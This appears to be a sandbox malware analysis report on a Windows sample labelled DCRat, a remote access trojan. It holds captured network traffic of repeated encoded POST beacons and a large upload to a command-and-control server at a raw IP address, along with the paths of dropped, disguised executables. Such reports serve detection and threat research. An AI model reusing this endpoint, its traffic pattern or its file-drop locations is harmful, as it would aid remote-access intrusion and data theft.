Jan 3, 2025 18:27:29.638132095 CET	380	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 17:27:29 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 152 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 0d 1d 27 04 26 02 2a 58 28 2f 20 01 26 55 29 5b 21 30 28 59 2f 0e 04 06 21 2c 0f 59 26 3b 23 0c 3c 3d 3d 18 28 0d 0f 1f 34 00 31 56 28 1a 28 5d 03 10 39 59 28 2d 0d 58 29 3e 31 15 3a 19 02 04 25 27 2b 04 2b 33 32 09 25 2c 25 0f 21 03 23 1e 28 30 32 00 24 3b 01 05 28 33 30 01 33 17 20 54 0b 17 24 08 33 23 3b 13 32 3b 39 5c 29 27 38 11 24 3a 0b 51 35 3c 04 51 23 17 23 02 2c 1e 35 53 24 38 3e 0b 3d 07 2b 53 26 03 32 1e 24 11 2e 5c 23 0f 28 55 0d 34 57 50 Data Ascii: '&*X(/ &U)[!0(Y/!,Y&;#<==(41V((]9Y(-X)>1:%'++32%,%!#(02$;(303 T$3#;2;9\)'8$:Q5<Q##,5S$8>=+S&2$.\#(U4WP

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 18:27:29.150423050 CET	340	OUT	POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 86.110.194.28 Content-Length: 2576 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 18:27:29.502727032 CET	2576	OUT	Data Raw: 5b 50 5e 5e 58 5f 50 5f 54 5b 59 5a 5b 5f 57 5b 5f 56 5a 58 52 54 50 41 5f 5d 5a 59 5e 5e 5a 5c 44 58 51 41 55 52 5b 51 5d 5f 5e 53 55 56 57 59 50 58 43 5d 41 5c 55 50 54 5f 56 59 50 56 59 59 59 56 5e 5a 57 52 5b 54 5b 5d 5c 50 5c 5c 5c 52 51 56 Data Ascii: [P^^X_P_T[YZ[_W[_VZXRTPA_]ZY^^Z\DXQAUR[Q]_^SUVWYPXC]A\UPT_VYPVYYYV^ZWR[T[]\P\\\RQV[_ZZ_]VRP^\ZZWXZ]U_WY^[XZ[T[G\__^WZ\TS^^^VQU_UY_ZUWRPUX_Q\ZXQXYWTZXUT_^^\Q\Z_UGVF]SZ_QP_P^Z^US__]WX[XU%)-1^6:$2< D((*X04-]2"!4!((\3_ A30V)9#Y'$X.
Jan 3, 2025 18:27:29.766931057 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 18:27:29.896819115 CET	207	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 17:27:29 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3f 55 5d 54 Data Ascii: ?U]T

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report lEwK4xROgV.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DCRat

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\Windows Portable Devices\97e8683a328693

C:\Program Files (x86)\Windows Portable Devices\kOfFkekrfoWUJKTEEHXqPfq.exe

C:\Program Files (x86)\Windows Portable Devices\kOfFkekrfoWUJKTEEHXqPfq.exe:Zone.Identifier

C:\Program Files\Common Files\Adobe\HelpCfg\en_US\97e8683a328693

C:\Program Files\Common Files\Adobe\HelpCfg\en_US\kOfFkekrfoWUJKTEEHXqPfq.exe

C:\Program Files\Common Files\Adobe\HelpCfg\en_US\kOfFkekrfoWUJKTEEHXqPfq.exe:Zone.Identifier

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Windows Analysis Report
lEwK4xROgV.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 18:27:30.146877050 CET	316	OUT	POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 86.110.194.28 Content-Length: 2576 Expect: 100-continue
Jan 3, 2025 18:27:30.502676964 CET	2576	OUT	Data Raw: 5b 53 5e 59 58 5f 50 59 54 5b 59 5a 5b 51 57 5e 5f 50 5a 54 52 5d 50 47 5f 5d 5a 59 5e 5e 5a 5c 44 58 51 41 55 52 5b 51 5d 5f 5e 53 55 56 57 59 50 58 43 5d 41 5c 55 50 54 5f 56 59 50 56 59 59 59 56 5e 5a 57 52 5b 54 5b 5d 5c 50 5c 5c 5c 52 51 56 Data Ascii: [S^YX_PYT[YZ[QW^_PZTR]PG_]ZY^^Z\DXQAUR[Q]_^SUVWYPXC]A\UPT_VYPVYYYV^ZWR[T[]\P\\\RQV[_ZZ_]VRP^\ZZWXZ]U_WY^[XZ[T[G\__^WZ\TS^^^VQU_UY_ZUWRPUX_Q\ZXQXYWTZXUT_^^\Q\Z_UGVF]SZ_QP_P^Z^US__]WX[XU&@<-)[6$2Z<(-$42<!S54:7^,%),A$<<+)#Y'$X.9
Jan 3, 2025 18:27:30.838896036 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 18:27:30.970470905 CET	151	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 17:27:30 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 3f 55 5d 54 Data Ascii: ?U]T

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 18:27:33.055418968 CET	340	OUT	POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 86.110.194.28 Content-Length: 2568 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 18:27:33.409058094 CET	2568	OUT	Data Raw: 5e 57 5b 5f 58 5b 55 5b 54 5b 59 5a 5b 57 57 59 5f 50 5a 5e 52 5d 50 46 5f 5d 5a 59 5e 5e 5a 5c 44 58 51 41 55 52 5b 51 5d 5f 5e 53 55 56 57 59 50 58 43 5d 41 5c 55 50 54 5f 56 59 50 56 59 59 59 56 5e 5a 57 52 5b 54 5b 5d 5c 50 5c 5c 5c 52 51 56 Data Ascii: ^W[_X[U[T[YZ[WWY_PZ^R]PF_]ZY^^Z\DXQAUR[Q]_^SUVWYPXC]A\UPT_VYPVYYYV^ZWR[T[]\P\\\RQV[_ZZ_]VRP^\ZZWXZ]U_WY^[XZ[T[G\__^WZ\TS^^^VQU_UY_ZUWRPUX_Q\ZXQXYWTZXUT_^^\Q\Z_UGVF]SZ_QP_P^Z^US__]WX[XU&C<..!:R2?$@]-%752/"B!U X0)$E0<8W?9#Y'$X.)
Jan 3, 2025 18:27:33.743057013 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 18:27:33.872131109 CET	207	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 17:27:33 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3f 55 5d 54 Data Ascii: ?U]T

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 18:27:34.172316074 CET	340	OUT	POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 86.110.194.28 Content-Length: 2576 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 18:27:34.518335104 CET	2576	OUT	Data Raw: 5e 52 5e 5b 58 5a 50 5f 54 5b 59 5a 5b 5e 57 5a 5f 51 5a 5c 52 53 50 46 5f 5d 5a 59 5e 5e 5a 5c 44 58 51 41 55 52 5b 51 5d 5f 5e 53 55 56 57 59 50 58 43 5d 41 5c 55 50 54 5f 56 59 50 56 59 59 59 56 5e 5a 57 52 5b 54 5b 5d 5c 50 5c 5c 5c 52 51 56 Data Ascii: ^R^[XZP_T[YZ[^WZ_QZ\RSPF_]ZY^^Z\DXQAUR[Q]_^SUVWYPXC]A\UPT_VYPVYYYV^ZWR[T[]\P\\\RQV[_ZZ_]VRP^\ZZWXZ]U_WY^[XZ[T[G\__^WZ\TS^^^VQU_UY_ZUWRPUX_Q\ZXQXYWTZXUT_^^\Q\Z_UGVF]SZ_QP_P^Z^US__]WX[XU%<.66:+$,#=+>'"2?)Q6$7709$$?+)#Y'$X.

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 18:27:34.648998976 CET	340	OUT	POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 86.110.194.28 Content-Length: 2052 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 18:27:35.002702951 CET	2052	OUT	Data Raw: 5e 52 5b 5d 58 56 50 59 54 5b 59 5a 5b 53 57 53 5f 5d 5a 5f 52 57 50 45 5f 5d 5a 59 5e 5e 5a 5c 44 58 51 41 55 52 5b 51 5d 5f 5e 53 55 56 57 59 50 58 43 5d 41 5c 55 50 54 5f 56 59 50 56 59 59 59 56 5e 5a 57 52 5b 54 5b 5d 5c 50 5c 5c 5c 52 51 56 Data Ascii: ^R[]XVPYT[YZ[SWS_]Z_RWPE_]ZY^^Z\DXQAUR[Q]_^SUVWYPXC]A\UPT_VYPVYYYV^ZWR[T[]\P\\\RQV[_ZZ_]VRP^\ZZWXZ]U_WY^[XZ[T[G\__^WZ\TS^^^VQU_UY_ZUWRPUX_Q\ZXQXYWTZXUT_^^\Q\Z_UGVF]SZ_QP_P^Z^US__]WX[XU&(=5:31<(E);2_$$=\&)P69#8Y398E'/+#Y'$X.1
Jan 3, 2025 18:27:35.353427887 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 18:27:35.485681057 CET	380	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 17:27:35 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 152 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 0d 1d 24 13 25 05 2e 59 3d 3f 0d 58 26 1d 22 00 36 30 0d 04 3b 0e 35 18 21 02 2d 5b 32 38 2c 56 3d 3e 21 1a 3c 0d 2e 0d 20 10 03 10 3f 30 28 5d 03 10 39 1e 2b 03 23 59 29 2d 29 5f 2e 19 23 19 30 0e 20 1f 3d 33 0f 13 26 12 03 0a 21 13 0e 0b 3d 30 3a 07 33 2b 33 04 28 23 2b 5f 27 07 20 54 0b 17 27 1d 24 56 27 5a 32 28 39 10 29 24 38 1f 33 03 25 57 21 2c 36 50 23 39 06 18 2c 09 3a 0d 24 28 29 54 3d 00 0e 0c 31 2a 04 5c 26 2b 2e 5c 23 0f 28 55 0d 34 57 50 Data Ascii: $%.Y=?X&"60;5!-[28,V=>!<. ?0(]9+#Y)-)_.#0 =3&!=0:3+3(#+_' T'$V'Z2(9)$83%W!,6P#9,:$()T=1*\&+.\#(U4WP

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 18:27:34.791085958 CET	340	OUT	POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 86.110.194.28 Content-Length: 2576 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 18:27:35.143332005 CET	2576	OUT	Data Raw: 5b 5c 5e 5b 58 58 55 5b 54 5b 59 5a 5b 53 57 5f 5f 57 5a 5f 52 51 50 41 5f 5d 5a 59 5e 5e 5a 5c 44 58 51 41 55 52 5b 51 5d 5f 5e 53 55 56 57 59 50 58 43 5d 41 5c 55 50 54 5f 56 59 50 56 59 59 59 56 5e 5a 57 52 5b 54 5b 5d 5c 50 5c 5c 5c 52 51 56 Data Ascii: [\^[XXU[T[YZ[SW__WZ_RQPA_]ZY^^Z\DXQAUR[Q]_^SUVWYPXC]A\UPT_VYPVYYYV^ZWR[T[]\P\\\RQV[_ZZ_]VRP^\ZZWXZ]U_WY^[XZ[T[G\__^WZ\TS^^^VQU_UY_ZUWRPUX_Q\ZXQXYWTZXUT_^^\Q\Z_UGVF]SZ_QP_P^Z^US__]WX[XU&<>!_":&E=(.^$B)2?1!7)4(4Y%)$/$)9#Y'$X.1
Jan 3, 2025 18:27:35.487046957 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 18:27:35.622272015 CET	207	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 17:27:35 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3f 55 5d 54 Data Ascii: ?U]T

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 18:27:35.759906054 CET	316	OUT	POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 86.110.194.28 Content-Length: 2576 Expect: 100-continue
Jan 3, 2025 18:27:36.112097025 CET	2576	OUT	Data Raw: 5b 5d 5b 5c 58 5f 50 5f 54 5b 59 5a 5b 50 57 5e 5f 5d 5a 59 52 52 50 47 5f 5d 5a 59 5e 5e 5a 5c 44 58 51 41 55 52 5b 51 5d 5f 5e 53 55 56 57 59 50 58 43 5d 41 5c 55 50 54 5f 56 59 50 56 59 59 59 56 5e 5a 57 52 5b 54 5b 5d 5c 50 5c 5c 5c 52 51 56 Data Ascii: [][\X_P_T[YZ[PW^_]ZYRRPG_]ZY^^Z\DXQAUR[Q]_^SUVWYPXC]A\UPT_VYPVYYYV^ZWR[T[]\P\\\RQV[_ZZ_]VRP^\ZZWXZ]U_WY^[XZ[T[G\__^WZ\TS^^^VQU_UY_ZUWRPUX_Q\ZXQXYWTZXUT_^^\Q\Z_UGVF]SZ_QP_P^Z^US__]WX[XU&@+"!<U2??)(!'!\1Y654483<3/<S?#Y'$X.
Jan 3, 2025 18:27:36.468316078 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 18:27:36.602719069 CET	151	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 17:27:36 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 3f 55 5d 54 Data Ascii: ?U]T

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 18:27:37.241244078 CET	340	OUT	POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 86.110.194.28 Content-Length: 2576 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 18:27:37.596476078 CET	2576	OUT	Data Raw: 5e 51 5e 5e 58 58 50 51 54 5b 59 5a 5b 55 57 53 5f 55 5a 5d 52 51 50 45 5f 5d 5a 59 5e 5e 5a 5c 44 58 51 41 55 52 5b 51 5d 5f 5e 53 55 56 57 59 50 58 43 5d 41 5c 55 50 54 5f 56 59 50 56 59 59 59 56 5e 5a 57 52 5b 54 5b 5d 5c 50 5c 5c 5c 52 51 56 Data Ascii: ^Q^^XXPQT[YZ[UWS_UZ]RQPE_]ZY^^Z\DXQAUR[Q]_^SUVWYPXC]A\UPT_VYPVYYYV^ZWR[T[]\P\\\RQV[_ZZ_]VRP^\ZZWXZ]U_WY^[XZ[T[G\__^WZ\TS^^^VQU_UY_ZUWRPUX_Q\ZXQXYWTZXUT_^^\Q\Z_UGVF]SZ_QP_P^Z^US__]WX[XU&+=!\!0U$<?*Y'.&<>"$-V!+(X$)+$S(#Y'$X.)
Jan 3, 2025 18:27:37.937427044 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 18:27:38.067295074 CET	207	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 17:27:37 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3f 55 5d 54 Data Ascii: ?U]T

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 18:27:38.213171005 CET	340	OUT	POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 86.110.194.28 Content-Length: 2576 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 18:27:38.565215111 CET	2576	OUT	Data Raw: 5b 51 5e 5e 5d 59 50 5e 54 5b 59 5a 5b 54 57 53 5f 52 5a 5b 52 5c 50 43 5f 5d 5a 59 5e 5e 5a 5c 44 58 51 41 55 52 5b 51 5d 5f 5e 53 55 56 57 59 50 58 43 5d 41 5c 55 50 54 5f 56 59 50 56 59 59 59 56 5e 5a 57 52 5b 54 5b 5d 5c 50 5c 5c 5c 52 51 56 Data Ascii: [Q^^]YP^T[YZ[TWS_RZ[R\PC_]ZY^^Z\DXQAUR[Q]_^SUVWYPXC]A\UPT_VYPVYYYV^ZWR[T[]\P\\\RQV[_ZZ_]VRP^\ZZWXZ]U_WY^[XZ[T[G\__^WZ\TS^^^VQU_UY_ZUWRPUX_Q\ZXQXYWTZXUT_^^\Q\Z_UGVF]SZ_QP_P^Z^US__]WX[XU%?=2!9/1,3*6'%!V!4: +0'700U+#Y'$X.-
Jan 3, 2025 18:27:38.919476032 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 18:27:39.056304932 CET	207	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 17:27:38 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3f 55 5d 54 Data Ascii: ?U]T

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 18:27:39.198837042 CET	340	OUT	POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 86.110.194.28 Content-Length: 2576 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 18:27:39.549678087 CET	2576	OUT	Data Raw: 5e 55 5b 58 58 59 55 5b 54 5b 59 5a 5b 55 57 5e 5f 52 5a 5e 52 53 50 45 5f 5d 5a 59 5e 5e 5a 5c 44 58 51 41 55 52 5b 51 5d 5f 5e 53 55 56 57 59 50 58 43 5d 41 5c 55 50 54 5f 56 59 50 56 59 59 59 56 5e 5a 57 52 5b 54 5b 5d 5c 50 5c 5c 5c 52 51 56 Data Ascii: ^U[XXYU[T[YZ[UW^_RZ^RSPE_]ZY^^Z\DXQAUR[Q]_^SUVWYPXC]A\UPT_VYPVYYYV^ZWR[T[]\P\\\RQV[_ZZ_]VRP^\ZZWXZ]U_WY^[XZ[T[G\__^WZ\TS^^^VQU_UY_ZUWRPUX_Q\ZXQXYWTZXUT_^^\Q\Z_UGVF]SZ_QP_P^Z^US__]WX[XU%<!Z"/$/?*^'5Y2<="-Q $Z'(3/0?#Y'$X.)
Jan 3, 2025 18:27:39.881741047 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 18:27:40.010487080 CET	207	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 17:27:39 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3f 55 5d 54 Data Ascii: ?U]T
Jan 3, 2025 18:27:40.227842093 CET	207	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 17:27:39 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3f 55 5d 54 Data Ascii: ?U]T

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 18:27:40.494733095 CET	340	OUT	POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 86.110.194.28 Content-Length: 2060 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 18:27:40.846458912 CET	2060	OUT	Data Raw: 5b 51 5b 5c 58 59 50 5e 54 5b 59 5a 5b 53 57 52 5f 53 5a 5c 52 52 50 40 5f 5d 5a 59 5e 5e 5a 5c 44 58 51 41 55 52 5b 51 5d 5f 5e 53 55 56 57 59 50 58 43 5d 41 5c 55 50 54 5f 56 59 50 56 59 59 59 56 5e 5a 57 52 5b 54 5b 5d 5c 50 5c 5c 5c 52 51 56 Data Ascii: [Q[\XYP^T[YZ[SWR_SZ\RRP@_]ZY^^Z\DXQAUR[Q]_^SUVWYPXC]A\UPT_VYPVYYYV^ZWR[T[]\P\\\RQV[_ZZ_]VRP^\ZZWXZ]U_WY^[XZ[T[G\__^WZ\TS^^^VQU_UY_ZUWRPUX_Q\ZXQXYWTZXUT_^^\Q\Z_UGVF]SZ_QP_P^Z^US__]WX[XU&B<->"* 1<E*_0=[1R"-Q ++'9C&< <)#Y'$X.1
Jan 3, 2025 18:27:41.175582886 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 18:27:41.303272009 CET	380	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 17:27:41 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 152 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 0d 1d 24 1e 32 5d 32 59 3d 01 3b 59 26 1d 2d 12 22 20 28 59 2f 30 00 42 21 02 25 5f 31 38 24 55 2b 3d 2a 43 28 0d 0b 1f 34 2e 25 54 3f 0a 28 5d 03 10 39 13 28 04 2b 58 3d 07 25 58 2e 27 3b 5c 27 19 2b 02 3e 20 25 57 32 3c 3a 55 21 3d 09 56 3d 0d 3e 03 24 15 28 5d 3f 0e 3f 12 24 07 20 54 0b 17 27 1e 26 23 3c 02 26 06 39 10 3d 37 28 5d 24 14 31 19 23 2c 0b 0f 20 29 28 17 2f 20 21 56 30 01 29 54 3e 3d 20 0f 26 29 22 11 27 3b 2e 5c 23 0f 28 55 0d 34 57 50 Data Ascii: $2]2Y=;Y&-" (Y/0B!%_18$U+=*C(4.%T?(]9(+X=%X.';\'+> %W2<:U!=V=>$(]??$ T'&#<&9=7(]$1#, )(/ !V0)T>= &)"';.\#(U4WP
Jan 3, 2025 18:27:41.303780079 CET	362	OUT	POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----yAbqlMJdghMCq8kxznRpE60jYE6iXlG5zi User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 86.110.194.28 Content-Length: 186586 Expect: 100-continue
Jan 3, 2025 18:27:41.514892101 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 18:27:41.515161991 CET	14832	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 79 41 62 71 6c 4d 4a 64 67 68 4d 43 71 38 6b 78 7a 6e 52 70 45 36 30 6a 59 45 36 69 58 6c 47 35 7a 69 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 30 22 Data Ascii: ------yAbqlMJdghMCq8kxznRpE60jYE6iXlG5ziContent-Disposition: form-data; name="0"Content-Type: text/plain[Q[X]^PXT[YZ[^W\_TZTRUPA_]ZY^^Z\DXQAUR[Q]_^SUVWYPXC]A\UPT_VYPVYYYV^ZWR[T[]\P\\\RQV[_ZZ_]VRP^\ZZWXZ]U_WY^[XZ[T[G\__^WZ\TS^^^VQU_UY_Z
Jan 3, 2025 18:27:41.520088911 CET	4944	OUT	Data Raw: 4a 44 63 4a 50 4f 32 79 72 6f 56 7a 79 58 7a 62 30 71 74 4e 6a 4b 30 56 43 6f 33 4d 46 72 64 33 6d 59 37 4e 70 6d 4b 76 70 55 76 31 37 64 57 67 78 69 72 52 43 6b 45 45 54 52 69 36 49 5a 34 67 52 78 54 65 70 4d 53 78 43 4f 7a 6f 58 57 6d 42 5a 6d Data Ascii: JDcJPO2yroVzyXzb0qtNjK0VCo3MFrd3mY7NpmKvpUv17dWgxirRCkEETRi6IZ4gRxTepMSxCOzoXWmBZm1miQWwb8ulHKGT58v5euRExU3M3LpEAaHVG8vakcSoDSQ8kCCcZAI/9EVTKPVA58JIkJYL6egjoh7F+mAEdPE4r4uKvXI/63hbG8cMCJ3YyfGyFAOidNnSU1pqjXlfdxeR/L4k98TpAEalEwxSHAXAYG5/GFG01Lt
Jan 3, 2025 18:27:41.520205021 CET	7416	OUT	Data Raw: 38 4f 47 6e 73 6d 32 4e 52 4a 47 58 4e 73 70 75 79 57 36 52 54 61 6b 44 37 37 77 63 39 2f 4a 65 4f 49 30 45 4a 63 2f 49 56 30 78 31 68 77 68 75 52 49 45 73 47 57 74 2f 6b 76 61 77 52 61 72 65 64 69 77 5a 63 45 74 70 48 4b 77 7a 56 6d 7a 73 76 31 Data Ascii: 8OGnsm2NRJGXNspuyW6RTakD77wc9/JeOI0EJc/IV0x1hwhuRIEsGWt/kvawRarediwZcEtpHKwzVmzsv1tbXjvG1bkvEz97gClscyAD1MUzGPcTp/HWJs8EvTPv8KzjJj5ZnRr64SNuyS6R3/eLLRnvfc7Y2LuXcJP0S/iu1B62/CTNeS1hfmyCp0X1pGD+GFZ/GImdTSMDtua5L2vkVKQIbdaXw9t8wpo7/ZQC4GFpa4dDEZn
Jan 3, 2025 18:27:41.520272017 CET	4944	OUT	Data Raw: 6b 6c 30 6e 54 5a 63 6d 30 4e 38 39 31 42 44 5a 51 38 4b 77 44 38 2b 54 7a 55 5a 46 50 4c 66 38 50 56 46 35 33 36 4b 51 41 65 42 67 62 62 6b 4e 34 33 4a 56 4f 6c 36 58 51 73 36 57 6f 43 42 31 2b 47 47 42 6e 48 35 77 38 50 4b 62 43 2f 76 77 45 6c Data Ascii: kl0nTZcm0N891BDZQ8KwD8+TzUZFPLf8PVF536KQAeBgbbkN43JVOl6XQs6WoCB1+GGBnH5w8PKbC/vwElXNAytddUU7Wxyi1LgSHR8DMiPuERU7vYDG6hMsWXvQnOprqAWsBbgnZce/vdXeWh0Q+4tyDDmlyL8dsN1DfeMrKVh/Q2FDE8w8c2/AViLKKlQfHjWk74fmvBQw5Vwm6GPROldc8Cl2fHxK4zJIRczRyMcGgC4DYhB
